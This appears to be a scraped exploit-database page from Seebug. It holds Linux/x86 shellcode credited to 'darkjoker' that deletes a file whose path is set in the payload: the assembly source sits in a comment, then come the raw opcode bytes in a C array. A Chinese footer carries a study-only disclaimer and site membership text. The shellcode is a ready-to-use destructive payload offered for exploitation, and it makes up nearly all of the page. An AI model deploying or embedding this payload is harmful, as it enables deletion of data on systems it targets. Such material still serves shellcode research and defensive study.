/* Author : darkjoker Site : http://darkjoker.net23.net Shellcode : linux/x86 File unlinker 18 bytes + file path length .global _start _start: jmp one two: pop %ebx movb $0xa,%al int $0x80 movb $0x1, %al xor %ebx, %ebx int $0x80 one: call two .string "file" */ char main [] = "\xeb\x0b\x5b\xb0\x0a\xcd\x80\xb0" "\x01\x31\xdb\xcd\x80\xe8\xf0\xff" "\xff\xff" "file" //Here file path to delete
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
暂无评论